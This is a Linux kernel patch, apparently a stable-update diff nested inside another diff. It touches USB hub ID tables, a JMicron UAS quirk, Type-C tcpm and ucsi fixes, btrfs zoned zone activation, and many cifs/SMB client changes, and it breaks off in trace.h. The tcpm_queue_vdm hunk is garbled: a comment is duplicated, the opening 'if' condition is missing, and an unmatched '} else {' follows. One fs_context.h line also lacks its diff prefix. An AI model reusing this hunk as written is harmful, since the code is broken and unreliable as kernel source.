+--- a/drivers/usb/misc/onboard_usb_hub.c
++++ b/drivers/usb/misc/onboard_usb_hub.c
+@@ -408,6 +408,7 @@ static void onboard_hub_usbdev_disconnect(struct usb_device *udev)
+ static const struct usb_device_id onboard_hub_id_table[] = {
+ 	{ USB_DEVICE(VENDOR_ID_GENESYS, 0x0608) }, /* Genesys Logic GL850G USB 2.0 */
+ 	{ USB_DEVICE(VENDOR_ID_MICROCHIP, 0x2514) }, /* USB2514B USB 2.0 */
++	{ USB_DEVICE(VENDOR_ID_MICROCHIP, 0x2517) }, /* USB2517 USB 2.0 */
+ 	{ USB_DEVICE(VENDOR_ID_REALTEK, 0x0411) }, /* RTS5411 USB 3.1 */
+ 	{ USB_DEVICE(VENDOR_ID_REALTEK, 0x5411) }, /* RTS5411 USB 2.1 */
+ 	{ USB_DEVICE(VENDOR_ID_REALTEK, 0x0414) }, /* RTS5414 USB 3.2 */
+diff --git a/drivers/usb/misc/onboard_usb_hub.h b/drivers/usb/misc/onboard_usb_hub.h
+index 62129a6a1ba5a..a97b0594773fa 100644
+--- a/drivers/usb/misc/onboard_usb_hub.h
++++ b/drivers/usb/misc/onboard_usb_hub.h
+@@ -28,6 +28,7 @@ static const struct onboard_hub_pdata genesys_gl850g_data = {
+ 
+ static const struct of_device_id onboard_hub_match[] = {
+ 	{ .compatible = "usb424,2514", .data = &microchip_usb424_data, },
++	{ .compatible = "usb424,2517", .data = &microchip_usb424_data, },
+ 	{ .compatible = "usb451,8140", .data = &ti_tusb8041_data, },
+ 	{ .compatible = "usb451,8142", .data = &ti_tusb8041_data, },
+ 	{ .compatible = "usb5e3,608", .data = &genesys_gl850g_data, },
+diff --git a/drivers/usb/storage/unusual_uas.h b/drivers/usb/storage/unusual_uas.h
+index c7b763d6d1023..1f8c9b16a0fb8 100644
+--- a/drivers/usb/storage/unusual_uas.h
++++ b/drivers/usb/storage/unusual_uas.h
+@@ -111,6 +111,13 @@ UNUSUAL_DEV(0x152d, 0x0578, 0x0000, 0x9999,
+ 		USB_SC_DEVICE, USB_PR_DEVICE, NULL,
+ 		US_FL_BROKEN_FUA),
+ 
++/* Reported by: Yaroslav Furman <yaro330@gmail.com> */
++UNUSUAL_DEV(0x152d, 0x0583, 0x0000, 0x9999,
++		"JMicron",
++		"JMS583Gen 2",
++		USB_SC_DEVICE, USB_PR_DEVICE, NULL,
++		US_FL_NO_REPORT_OPCODES),
++
+ /* Reported-by: Thinh Nguyen <thinhn@synopsys.com> */
+ UNUSUAL_DEV(0x154b, 0xf00b, 0x0000, 0x9999,
+ 		"PNY",
+diff --git a/drivers/usb/typec/tcpm/tcpm.c b/drivers/usb/typec/tcpm/tcpm.c
+index 59b366b5c6144..032d21a967799 100644
+--- a/drivers/usb/typec/tcpm/tcpm.c
++++ b/drivers/usb/typec/tcpm/tcpm.c
+@@ -1436,10 +1436,18 @@ static int tcpm_ams_start(struct tcpm_port *port, enum tcpm_ams ams)
+ static void tcpm_queue_vdm(struct tcpm_port *port, const u32 header,
+ 			   const u32 *data, int cnt)
+ {
++	u32 vdo_hdr = port->vdo_data[0];
++
+ 	WARN_ON(!mutex_is_locked(&port->lock));
+ 
+-	/* Make sure we are not still processing a previous VDM packet */
+-	WARN_ON(port->vdm_state > VDM_STATE_DONE);
++	/* If is sending discover_identity, handle received message first */
++	/* If sending discover_identity, handle the received message first */
++		port->send_discover = true;
++		mod_send_discover_delayed_work(port, SEND_DISCOVER_RETRY_MS);
++	} else {
++		/* Make sure we are not still processing a previous VDM packet */
++		WARN_ON(port->vdm_state > VDM_STATE_DONE);
++	}
+ 
+ 	port->vdo_count = cnt + 1;
+ 	port->vdo_data[0] = header;
+@@ -1942,11 +1950,13 @@ static void vdm_run_state_machine(struct tcpm_port *port)
+ 			switch (PD_VDO_CMD(vdo_hdr)) {
+ 			case CMD_DISCOVER_IDENT:
+ 				res = tcpm_ams_start(port, DISCOVER_IDENTITY);
+-				if (res == 0)
++				if (res == 0) {
+ 					port->send_discover = false;
+-				else if (res == -EAGAIN)
++				} else if (res == -EAGAIN) {
++					port->vdo_data[0] = 0;
+ 					mod_send_discover_delayed_work(port,
+ 								       SEND_DISCOVER_RETRY_MS);
++				}
+ 				break;
+ 			case CMD_DISCOVER_SVID:
+ 				res = tcpm_ams_start(port, DISCOVER_SVIDS);
+@@ -2029,6 +2039,7 @@ static void vdm_run_state_machine(struct tcpm_port *port)
+ 			unsigned long timeout;
+ 
+ 			port->vdm_retries = 0;
++			port->vdo_data[0] = 0;
+ 			port->vdm_state = VDM_STATE_BUSY;
+ 			timeout = vdm_ready_timeout(vdo_hdr);
+ 			mod_vdm_delayed_work(port, timeout);
+@@ -4547,6 +4558,9 @@ static void run_state_machine(struct tcpm_port *port)
+ 	case SOFT_RESET:
+ 		port->message_id = 0;
+ 		port->rx_msgid = -1;
++		/* remove existing capabilities */
++		usb_power_delivery_unregister_capabilities(port->partner_source_caps);
++		port->partner_source_caps = NULL;
+ 		tcpm_pd_send_control(port, PD_CTRL_ACCEPT);
+ 		tcpm_ams_finish(port);
+ 		if (port->pwr_role == TYPEC_SOURCE) {
+@@ -4566,6 +4580,9 @@ static void run_state_machine(struct tcpm_port *port)
+ 	case SOFT_RESET_SEND:
+ 		port->message_id = 0;
+ 		port->rx_msgid = -1;
++		/* remove existing capabilities */
++		usb_power_delivery_unregister_capabilities(port->partner_source_caps);
++		port->partner_source_caps = NULL;
+ 		if (tcpm_pd_send_control(port, PD_CTRL_SOFT_RESET))
+ 			tcpm_set_state_cond(port, hard_reset_state(port), 0);
+ 		else
+@@ -4695,6 +4712,9 @@ static void run_state_machine(struct tcpm_port *port)
+ 		tcpm_set_state(port, SNK_STARTUP, 0);
+ 		break;
+ 	case PR_SWAP_SNK_SRC_SINK_OFF:
++		/* will be source, remove existing capabilities */
++		usb_power_delivery_unregister_capabilities(port->partner_source_caps);
++		port->partner_source_caps = NULL;
+ 		/*
+ 		 * Prevent vbus discharge circuit from turning on during PR_SWAP
+ 		 * as this is not a disconnect.
+diff --git a/drivers/usb/typec/ucsi/ucsi.c b/drivers/usb/typec/ucsi/ucsi.c
+index 1cf8947c6d661..8cbbb002fefe0 100644
+--- a/drivers/usb/typec/ucsi/ucsi.c
++++ b/drivers/usb/typec/ucsi/ucsi.c
+@@ -1205,7 +1205,7 @@ out_unlock:
+ static int ucsi_init(struct ucsi *ucsi)
+ {
+ 	struct ucsi_connector *con;
+-	u64 command;
++	u64 command, ntfy;
+ 	int ret;
+ 	int i;
+ 
+@@ -1217,8 +1217,8 @@ static int ucsi_init(struct ucsi *ucsi)
+ 	}
+ 
+ 	/* Enable basic notifications */
+-	ucsi->ntfy = UCSI_ENABLE_NTFY_CMD_COMPLETE | UCSI_ENABLE_NTFY_ERROR;
+-	command = UCSI_SET_NOTIFICATION_ENABLE | ucsi->ntfy;
++	ntfy = UCSI_ENABLE_NTFY_CMD_COMPLETE | UCSI_ENABLE_NTFY_ERROR;
++	command = UCSI_SET_NOTIFICATION_ENABLE | ntfy;
+ 	ret = ucsi_send_command(ucsi, command, NULL, 0);
+ 	if (ret < 0)
+ 		goto err_reset;
+@@ -1250,12 +1250,13 @@ static int ucsi_init(struct ucsi *ucsi)
+ 	}
+ 
+ 	/* Enable all notifications */
+-	ucsi->ntfy = UCSI_ENABLE_NTFY_ALL;
+-	command = UCSI_SET_NOTIFICATION_ENABLE | ucsi->ntfy;
++	ntfy = UCSI_ENABLE_NTFY_ALL;
++	command = UCSI_SET_NOTIFICATION_ENABLE | ntfy;
+ 	ret = ucsi_send_command(ucsi, command, NULL, 0);
+ 	if (ret < 0)
+ 		goto err_unregister;
+ 
++	ucsi->ntfy = ntfy;
+ 	return 0;
+ 
+ err_unregister:
+diff --git a/drivers/usb/typec/ucsi/ucsi_acpi.c b/drivers/usb/typec/ucsi/ucsi_acpi.c
+index ce0c8ef80c043..62206a6b8ea75 100644
+--- a/drivers/usb/typec/ucsi/ucsi_acpi.c
++++ b/drivers/usb/typec/ucsi/ucsi_acpi.c
+@@ -78,7 +78,7 @@ static int ucsi_acpi_sync_write(struct ucsi *ucsi, unsigned int offset,
+ 	if (ret)
+ 		goto out_clear_bit;
+ 
+-	if (!wait_for_completion_timeout(&ua->complete, HZ))
++	if (!wait_for_completion_timeout(&ua->complete, 5 * HZ))
+ 		ret = -ETIMEDOUT;
+ 
+ out_clear_bit:
+diff --git a/fs/btrfs/zoned.c b/fs/btrfs/zoned.c
+index 1f503e8e42d48..f3b7d8ae93a9f 100644
+--- a/fs/btrfs/zoned.c
++++ b/fs/btrfs/zoned.c
+@@ -2100,11 +2100,21 @@ bool btrfs_can_activate_zone(struct btrfs_fs_devices *fs_devices, u64 flags)
+ 		if (!device->bdev)
+ 			continue;
+ 
+-		if (!zinfo->max_active_zones ||
+-		    atomic_read(&zinfo->active_zones_left)) {
++		if (!zinfo->max_active_zones) {
+ 			ret = true;
+ 			break;
+ 		}
++
++		switch (flags & BTRFS_BLOCK_GROUP_PROFILE_MASK) {
++		case 0: /* single */
++			ret = (atomic_read(&zinfo->active_zones_left) >= 1);
++			break;
++		case BTRFS_BLOCK_GROUP_DUP:
++			ret = (atomic_read(&zinfo->active_zones_left) >= 2);
++			break;
++		}
++		if (ret)
++			break;
+ 	}
+ 	mutex_unlock(&fs_info->chunk_mutex);
+ 
+diff --git a/fs/cifs/cached_dir.c b/fs/cifs/cached_dir.c
+index 75d5e06306ea5..bfc964b36c72e 100644
+--- a/fs/cifs/cached_dir.c
++++ b/fs/cifs/cached_dir.c
+@@ -99,6 +99,23 @@ path_to_dentry(struct cifs_sb_info *cifs_sb, const char *path)
+ 	return dentry;
+ }
+ 
++static const char *path_no_prefix(struct cifs_sb_info *cifs_sb,
++				  const char *path)
++{
++	size_t len = 0;
++
++	if (!*path)
++		return path;
++
++	if ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_USE_PREFIX_PATH) &&
++	    cifs_sb->prepath) {
++		len = strlen(cifs_sb->prepath) + 1;
++		if (unlikely(len > strlen(path)))
++			return ERR_PTR(-EINVAL);
++	}
++	return path + len;
++}
++
+ /*
+  * Open and cache a directory handle.
+  * If error then *cfid is not initialized.
+@@ -125,6 +142,7 @@ int open_cached_dir(unsigned int xid, struct cifs_tcon *tcon,
+ 	struct dentry *dentry = NULL;
+ 	struct cached_fid *cfid;
+ 	struct cached_fids *cfids;
++	const char *npath;
+ 
+ 	if (tcon == NULL || tcon->cfids == NULL || tcon->nohandlecache ||
+ 	    is_smb1_server(tcon->ses->server))
+@@ -160,6 +178,20 @@ int open_cached_dir(unsigned int xid, struct cifs_tcon *tcon,
+ 		return 0;
+ 	}
+ 
++	/*
++	 * Skip any prefix paths in @path as lookup_positive_unlocked() ends up
++	 * calling ->lookup() which already adds those through
++	 * build_path_from_dentry().  Also, do it earlier as we might reconnect
++	 * below when trying to send a compounded request and then potentially
++	 * end up with a different prefix path (e.g. after DFS failover).
++	 */
++	npath = path_no_prefix(cifs_sb, path);
++	if (IS_ERR(npath)) {
++		rc = PTR_ERR(npath);
++		kfree(utf16_path);
++		return rc;
++	}
++
+ 	/*
+ 	 * We do not hold the lock for the open because in case
+ 	 * SMB2_open needs to reconnect.
+@@ -184,6 +216,7 @@ int open_cached_dir(unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
++		.path = path,
+ 		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_FILE),
+ 		.desired_access = FILE_READ_ATTRIBUTES,
+ 		.disposition = FILE_OPEN,
+@@ -251,10 +284,10 @@ int open_cached_dir(unsigned int xid, struct cifs_tcon *tcon,
+ 				(char *)&cfid->file_all_info))
+ 		cfid->file_all_info_is_valid = true;
+ 
+-	if (!path[0])
++	if (!npath[0])
+ 		dentry = dget(cifs_sb->root);
+ 	else {
+-		dentry = path_to_dentry(cifs_sb, path);
++		dentry = path_to_dentry(cifs_sb, npath);
+ 		if (IS_ERR(dentry)) {
+ 			rc = -ENOENT;
+ 			goto oshr_free;
+diff --git a/fs/cifs/cifs_debug.c b/fs/cifs/cifs_debug.c
+index d9876bd396fd4..72e24256b5ec2 100644
+--- a/fs/cifs/cifs_debug.c
++++ b/fs/cifs/cifs_debug.c
+@@ -175,7 +175,7 @@ static int cifs_debug_files_proc_show(struct seq_file *m, void *v)
+ 
+ 	seq_puts(m, "# Version:1\n");
+ 	seq_puts(m, "# Format:\n");
+-	seq_puts(m, "# <tree id> <persistent fid> <flags> <count> <pid> <uid>");
++	seq_puts(m, "# <tree id> <ses id> <persistent fid> <flags> <count> <pid> <uid>");
+ #ifdef CONFIG_CIFS_DEBUG2
+ 	seq_printf(m, " <filename> <mid>\n");
+ #else
+@@ -188,8 +188,9 @@ static int cifs_debug_files_proc_show(struct seq_file *m, void *v)
+ 				spin_lock(&tcon->open_file_lock);
+ 				list_for_each_entry(cfile, &tcon->openFileList, tlist) {
+ 					seq_printf(m,
+-						"0x%x 0x%llx 0x%x %d %d %d %pd",
++						"0x%x 0x%llx 0x%llx 0x%x %d %d %d %pd",
+ 						tcon->tid,
++						ses->Suid,
+ 						cfile->fid.persistent_fid,
+ 						cfile->f_flags,
+ 						cfile->count,
+@@ -215,6 +216,7 @@ static int cifs_debug_data_proc_show(struct seq_file *m, void *v)
+ {
+ 	struct mid_q_entry *mid_entry;
+ 	struct TCP_Server_Info *server;
++	struct TCP_Server_Info *chan_server;
+ 	struct cifs_ses *ses;
+ 	struct cifs_tcon *tcon;
+ 	struct cifs_server_iface *iface;
+@@ -471,23 +473,35 @@ skip_rdma:
+ 					seq_puts(m, "\t\t[CONNECTED]\n");
+ 			}
+ 			spin_unlock(&ses->iface_lock);
++
++			seq_puts(m, "\n\n\tMIDs: ");
++			spin_lock(&ses->chan_lock);
++			for (j = 0; j < ses->chan_count; j++) {
++				chan_server = ses->chans[j].server;
++				if (!chan_server)
++					continue;
++
++				if (list_empty(&chan_server->pending_mid_q))
++					continue;
++
++				seq_printf(m, "\n\tServer ConnectionId: 0x%llx",
++					   chan_server->conn_id);
++				spin_lock(&chan_server->mid_lock);
++				list_for_each_entry(mid_entry, &chan_server->pending_mid_q, qhead) {
++					seq_printf(m, "\n\t\tState: %d com: %d pid: %d cbdata: %p mid %llu",
++						   mid_entry->mid_state,
++						   le16_to_cpu(mid_entry->command),
++						   mid_entry->pid,
++						   mid_entry->callback_data,
++						   mid_entry->mid);
++				}
++				spin_unlock(&chan_server->mid_lock);
++			}
++			spin_unlock(&ses->chan_lock);
++			seq_puts(m, "\n--\n");
+ 		}
+ 		if (i == 0)
+ 			seq_printf(m, "\n\t\t[NONE]");
+-
+-		seq_puts(m, "\n\n\tMIDs: ");
+-		spin_lock(&server->mid_lock);
+-		list_for_each_entry(mid_entry, &server->pending_mid_q, qhead) {
+-			seq_printf(m, "\n\tState: %d com: %d pid:"
+-					" %d cbdata: %p mid %llu\n",
+-					mid_entry->mid_state,
+-					le16_to_cpu(mid_entry->command),
+-					mid_entry->pid,
+-					mid_entry->callback_data,
+-					mid_entry->mid);
+-		}
+-		spin_unlock(&server->mid_lock);
+-		seq_printf(m, "\n--\n");
+ 	}
+ 	if (c == 0)
+ 		seq_printf(m, "\n\t[NONE]");
+diff --git a/fs/cifs/cifsfs.c b/fs/cifs/cifsfs.c
+index 10e00c6249228..8485d380cddf9 100644
+--- a/fs/cifs/cifsfs.c
++++ b/fs/cifs/cifsfs.c
+@@ -730,13 +730,16 @@ static void cifs_umount_begin(struct super_block *sb)
+ 	spin_lock(&tcon->tc_lock);
+ 	if ((tcon->tc_count > 1) || (tcon->status == TID_EXITING)) {
+ 		/* we have other mounts to same share or we have
+-		   already tried to force umount this and woken up
++		   already tried to umount this and woken up
+ 		   all waiting network requests, nothing to do */
+ 		spin_unlock(&tcon->tc_lock);
+ 		spin_unlock(&cifs_tcp_ses_lock);
+ 		return;
+-	} else if (tcon->tc_count == 1)
+-		tcon->status = TID_EXITING;
++	}
++	/*
++	 * cannot set tcon->status to TID_EXITING yet since we don't know if umount -f will
++	 * fail later (e.g. due to open files).  TID_EXITING will be set just before the tdis req is sent
++	 */
+ 	spin_unlock(&tcon->tc_lock);
+ 	spin_unlock(&cifs_tcp_ses_lock);
+ 
+diff --git a/fs/cifs/cifssmb.c b/fs/cifs/cifssmb.c
+index 8c014a3ff9e00..566e6a26b897c 100644
+--- a/fs/cifs/cifssmb.c
++++ b/fs/cifs/cifssmb.c
+@@ -85,13 +85,11 @@ cifs_reconnect_tcon(struct cifs_tcon *tcon, int smb_command)
+ 
+ 	/*
+ 	 * only tree disconnect, open, and write, (and ulogoff which does not
+-	 * have tcon) are allowed as we start force umount
++	 * have tcon) are allowed as we start umount
+ 	 */
+ 	spin_lock(&tcon->tc_lock);
+ 	if (tcon->status == TID_EXITING) {
+-		if (smb_command != SMB_COM_WRITE_ANDX &&
+-		    smb_command != SMB_COM_OPEN_ANDX &&
+-		    smb_command != SMB_COM_TREE_DISCONNECT) {
++		if (smb_command != SMB_COM_TREE_DISCONNECT) {
+ 			spin_unlock(&tcon->tc_lock);
+ 			cifs_dbg(FYI, "can not send cmd %d while umounting\n",
+ 				 smb_command);
+diff --git a/fs/cifs/connect.c b/fs/cifs/connect.c
+index 5a889f5f5c3e5..6da2af97b8bac 100644
+--- a/fs/cifs/connect.c
++++ b/fs/cifs/connect.c
+@@ -1770,7 +1770,7 @@ out_err:
+ 	return ERR_PTR(rc);
+ }
+ 
+-/* this function must be called with ses_lock held */
++/* this function must be called with ses_lock and chan_lock held */
+ static int match_session(struct cifs_ses *ses, struct smb3_fs_context *ctx)
+ {
+ 	if (ctx->sectype != Unspecified &&
+@@ -1781,12 +1781,8 @@ static int match_session(struct cifs_ses *ses, struct smb3_fs_context *ctx)
+ 	 * If an existing session is limited to less channels than
+ 	 * requested, it should not be reused
+ 	 */
+-	spin_lock(&ses->chan_lock);
+-	if (ses->chan_max < ctx->max_channels) {
+-		spin_unlock(&ses->chan_lock);
++	if (ses->chan_max < ctx->max_channels)
+ 		return 0;
+-	}
+-	spin_unlock(&ses->chan_lock);
+ 
+ 	switch (ses->sectype) {
+ 	case Kerberos:
+@@ -1914,10 +1910,13 @@ cifs_find_smb_ses(struct TCP_Server_Info *server, struct smb3_fs_context *ctx)
+ 			spin_unlock(&ses->ses_lock);
+ 			continue;
+ 		}
++		spin_lock(&ses->chan_lock);
+ 		if (!match_session(ses, ctx)) {
++			spin_unlock(&ses->chan_lock);
+ 			spin_unlock(&ses->ses_lock);
+ 			continue;
+ 		}
++		spin_unlock(&ses->chan_lock);
+ 		spin_unlock(&ses->ses_lock);
+ 
+ 		++ses->ses_count;
+@@ -2363,6 +2362,7 @@ cifs_put_tcon(struct cifs_tcon *tcon)
+ 	WARN_ON(tcon->tc_count < 0);
+ 
+ 	list_del_init(&tcon->tcon_list);
++	tcon->status = TID_EXITING;
+ 	spin_unlock(&tcon->tc_lock);
+ 	spin_unlock(&cifs_tcp_ses_lock);
+ 
+@@ -2742,6 +2742,7 @@ cifs_match_super(struct super_block *sb, void *data)
+ 
+ 	spin_lock(&tcp_srv->srv_lock);
+ 	spin_lock(&ses->ses_lock);
++	spin_lock(&ses->chan_lock);
+ 	spin_lock(&tcon->tc_lock);
+ 	if (!match_server(tcp_srv, ctx, dfs_super_cmp) ||
+ 	    !match_session(ses, ctx) ||
+@@ -2754,6 +2755,7 @@ cifs_match_super(struct super_block *sb, void *data)
+ 	rc = compare_mount_options(sb, mnt_data);
+ out:
+ 	spin_unlock(&tcon->tc_lock);
++	spin_unlock(&ses->chan_lock);
+ 	spin_unlock(&ses->ses_lock);
+ 	spin_unlock(&tcp_srv->srv_lock);
+ 
+diff --git a/fs/cifs/fs_context.h b/fs/cifs/fs_context.h
+index 1b8d4e27f831c..3de00e7127ec4 100644
+--- a/fs/cifs/fs_context.h
++++ b/fs/cifs/fs_context.h
+@@ -286,5 +286,5 @@ extern void smb3_update_mnt_flags(struct cifs_sb_info *cifs_sb);
+  * max deferred close timeout (jiffies) - 2^30
+  */
+ #define SMB3_MAX_DCLOSETIMEO (1 << 30)
+-#define SMB3_DEF_DCLOSETIMEO (5 * HZ) /* Can increase later, other clients use larger */
+#define SMB3_DEF_DCLOSETIMEO (1 * HZ) /* even 1 sec is enough to help e.g. open/write/close/open/read */
+ #endif
+diff --git a/fs/cifs/link.c b/fs/cifs/link.c
+index d937eedd74fb6..c0f101fc1e5d0 100644
+--- a/fs/cifs/link.c
++++ b/fs/cifs/link.c
+@@ -360,6 +360,7 @@ smb3_query_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
+ 		.cifs_sb = cifs_sb,
++		.path = path,
+ 		.desired_access = GENERIC_READ,
+ 		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
+ 		.disposition = FILE_OPEN,
+@@ -427,6 +428,7 @@ smb3_create_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
+ 		.cifs_sb = cifs_sb,
++		.path = path,
+ 		.desired_access = GENERIC_WRITE,
+ 		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
+ 		.disposition = FILE_CREATE,
+diff --git a/fs/cifs/smb2inode.c b/fs/cifs/smb2inode.c
+index 8dd3791b5c538..163a03298430d 100644
+--- a/fs/cifs/smb2inode.c
++++ b/fs/cifs/smb2inode.c
+@@ -107,6 +107,7 @@ static int smb2_compound_op(const unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 	vars->oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
++		.path = full_path,
+ 		.desired_access = desired_access,
+ 		.disposition = create_disposition,
+ 		.create_options = cifs_create_options(cifs_sb, create_options),
+diff --git a/fs/cifs/smb2ops.c b/fs/cifs/smb2ops.c
+index c7f8dba5a855a..502b6915ccc41 100644
+--- a/fs/cifs/smb2ops.c
++++ b/fs/cifs/smb2ops.c
+@@ -530,6 +530,14 @@ parse_server_interfaces(struct network_interface_info_ioctl_rsp *buf,
+ 	p = buf;
+ 
+ 	spin_lock(&ses->iface_lock);
++	/* do not query too frequently, this time with lock held */
++	if (ses->iface_last_update &&
++	    time_before(jiffies, ses->iface_last_update +
++			(SMB_INTERFACE_POLL_INTERVAL * HZ))) {
++		spin_unlock(&ses->iface_lock);
++		return 0;
++	}
++
+ 	/*
+ 	 * Go through iface_list and do kref_put to remove
+ 	 * any unused ifaces. ifaces in use will be removed
+@@ -696,6 +704,12 @@ SMB3_request_interfaces(const unsigned int xid, struct cifs_tcon *tcon, bool in_
+ 	struct network_interface_info_ioctl_rsp *out_buf = NULL;
+ 	struct cifs_ses *ses = tcon->ses;
+ 
++	/* do not query too frequently */
++	if (ses->iface_last_update &&
++	    time_before(jiffies, ses->iface_last_update +
++			(SMB_INTERFACE_POLL_INTERVAL * HZ)))
++		return 0;
++
+ 	rc = SMB2_ioctl(xid, tcon, NO_FILE_ID, NO_FILE_ID,
+ 			FSCTL_QUERY_NETWORK_INTERFACE_INFO,
+ 			NULL /* no data input */, 0 /* no data input */,
+@@ -703,7 +717,7 @@ SMB3_request_interfaces(const unsigned int xid, struct cifs_tcon *tcon, bool in_
+ 	if (rc == -EOPNOTSUPP) {
+ 		cifs_dbg(FYI,
+ 			 "server does not support query network interfaces\n");
+-		goto out;
++		ret_data_len = 0;
+ 	} else if (rc != 0) {
+ 		cifs_tcon_dbg(VFS, "error %d on ioctl to get interface list\n", rc);
+ 		goto out;
+@@ -731,6 +745,7 @@ smb3_qfs_tcon(const unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
++		.path = "",
+ 		.desired_access = FILE_READ_ATTRIBUTES,
+ 		.disposition = FILE_OPEN,
+ 		.create_options = cifs_create_options(cifs_sb, 0),
+@@ -774,6 +789,7 @@ smb2_qfs_tcon(const unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
++		.path = "",
+ 		.desired_access = FILE_READ_ATTRIBUTES,
+ 		.disposition = FILE_OPEN,
+ 		.create_options = cifs_create_options(cifs_sb, 0),
+@@ -821,6 +837,7 @@ smb2_is_path_accessible(const unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
++		.path = full_path,
+ 		.desired_access = FILE_READ_ATTRIBUTES,
+ 		.disposition = FILE_OPEN,
+ 		.create_options = cifs_create_options(cifs_sb, 0),
+@@ -1105,6 +1122,7 @@ smb2_set_ea(const unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
++		.path = path,
+ 		.desired_access = FILE_WRITE_EA,
+ 		.disposition = FILE_OPEN,
+ 		.create_options = cifs_create_options(cifs_sb, 0),
+@@ -2096,6 +2114,7 @@ smb3_notify(const unsigned int xid, struct file *pfile,
+ 	tcon = cifs_sb_master_tcon(cifs_sb);
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
++		.path = path,
+ 		.desired_access = FILE_READ_ATTRIBUTES | FILE_READ_DATA,
+ 		.disposition = FILE_OPEN,
+ 		.create_options = cifs_create_options(cifs_sb, 0),
+@@ -2168,6 +2187,7 @@ smb2_query_dir_first(const unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
++		.path = path,
+ 		.desired_access = FILE_READ_ATTRIBUTES | FILE_READ_DATA,
+ 		.disposition = FILE_OPEN,
+ 		.create_options = cifs_create_options(cifs_sb, 0),
+@@ -2500,6 +2520,7 @@ smb2_query_info_compound(const unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
++		.path = path,
+ 		.desired_access = desired_access,
+ 		.disposition = FILE_OPEN,
+ 		.create_options = cifs_create_options(cifs_sb, 0),
+@@ -2634,6 +2655,7 @@ smb311_queryfs(const unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
++		.path = "",
+ 		.desired_access = FILE_READ_ATTRIBUTES,
+ 		.disposition = FILE_OPEN,
+ 		.create_options = cifs_create_options(cifs_sb, 0),
+@@ -2928,6 +2950,7 @@ smb2_query_symlink(const unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
++		.path = full_path,
+ 		.desired_access = FILE_READ_ATTRIBUTES,
+ 		.disposition = FILE_OPEN,
+ 		.create_options = cifs_create_options(cifs_sb, create_options),
+@@ -3068,6 +3091,7 @@ smb2_query_reparse_tag(const unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
++		.path = full_path,
+ 		.desired_access = FILE_READ_ATTRIBUTES,
+ 		.disposition = FILE_OPEN,
+ 		.create_options = cifs_create_options(cifs_sb, OPEN_REPARSE_POINT),
+@@ -3208,6 +3232,7 @@ get_smb2_acl_by_path(struct cifs_sb_info *cifs_sb,
+ 
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
++		.path = path,
+ 		.desired_access = READ_CONTROL,
+ 		.disposition = FILE_OPEN,
+ 		/*
+diff --git a/fs/cifs/smb2pdu.c b/fs/cifs/smb2pdu.c
+index 23926f754d2aa..6e6e44d8b4c79 100644
+--- a/fs/cifs/smb2pdu.c
++++ b/fs/cifs/smb2pdu.c
+@@ -225,13 +225,9 @@ smb2_reconnect(__le16 smb2_command, struct cifs_tcon *tcon,
+ 	spin_lock(&tcon->tc_lock);
+ 	if (tcon->status == TID_EXITING) {
+ 		/*
+-		 * only tree disconnect, open, and write,
+-		 * (and ulogoff which does not have tcon)
+-		 * are allowed as we start force umount.
++		 * only tree disconnect is allowed when disconnecting ...
+ 		 */
+-		if ((smb2_command != SMB2_WRITE) &&
+-		   (smb2_command != SMB2_CREATE) &&
+-		   (smb2_command != SMB2_TREE_DISCONNECT)) {
++		if (smb2_command != SMB2_TREE_DISCONNECT) {
+ 			spin_unlock(&tcon->tc_lock);
+ 			cifs_dbg(FYI, "can not send cmd %d while umounting\n",
+ 				 smb2_command);
+@@ -2746,7 +2742,7 @@ int smb311_posix_mkdir(const unsigned int xid, struct inode *inode,
+ 	rqst.rq_nvec = n_iov;
+ 
+ 	/* no need to inc num_remote_opens because we close it just below */
+-	trace_smb3_posix_mkdir_enter(xid, tcon->tid, ses->Suid, CREATE_NOT_FILE,
++	trace_smb3_posix_mkdir_enter(xid, tcon->tid, ses->Suid, full_path, CREATE_NOT_FILE,
+ 				    FILE_WRITE_ATTRIBUTES);
+ 	/* resource #4: response buffer */
+ 	rc = cifs_send_recv(xid, ses, server,
+@@ -3014,7 +3010,7 @@ SMB2_open(const unsigned int xid, struct cifs_open_parms *oparms, __le16 *path,
+ 	if (rc)
+ 		goto creat_exit;
+ 
+-	trace_smb3_open_enter(xid, tcon->tid, tcon->ses->Suid,
++	trace_smb3_open_enter(xid, tcon->tid, tcon->ses->Suid, oparms->path,
+ 		oparms->create_options, oparms->desired_access);
+ 
+ 	rc = cifs_send_recv(xid, ses, server,
+diff --git a/fs/cifs/trace.h b/fs/cifs/trace.h
+index 110070ba8b04e..d3053bd8ae731 100644
+--- a/fs/cifs/trace.h
++++ b/fs/cifs/trace.h
+@@ -701,13 +701,15 @@ DECLARE_EVENT_CLASS(smb3_open_enter_class,
+ 	TP_PROTO(unsigned int xid,
+ 		__u32	tid,
+ 		__u64	sesid,
++		const char *full_path,
